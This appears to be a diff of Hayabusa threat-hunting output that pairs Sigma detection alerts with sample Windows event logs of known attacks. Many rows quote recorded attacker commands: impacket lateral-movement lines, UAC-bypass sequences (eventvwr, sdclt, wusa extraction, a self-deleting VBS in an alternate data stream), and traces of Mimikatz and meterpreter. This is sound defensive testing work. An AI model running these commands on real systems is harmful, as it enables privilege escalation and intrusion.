+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd  1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  /all   :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding  :  Path: C:\Windows\System32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd  1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  /all   :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
+2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe  :  Path: C:\Windows\System32\VSSVC.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp""  :  Path: C:\Windows\Installer\MSI4FFD.tmp  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
+2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570  :  LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570  :  LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""   :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe   :  Path: C:\Windows\System32\wsqmcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev   :  Path: C:\Windows\System32\sdclt.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp   :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp   :  Path: C:\Windows\System32\makecab.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe""  C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet  :  Path: C:\Windows\System32\wusa.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs""""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe""   :  Path: C:\Windows\System32\sdclt.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""  /name Microsoft.BackupAndRestoreCenter  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc""  :  Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python  winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe  :  Path: C:\Python27\python.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  /priv  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
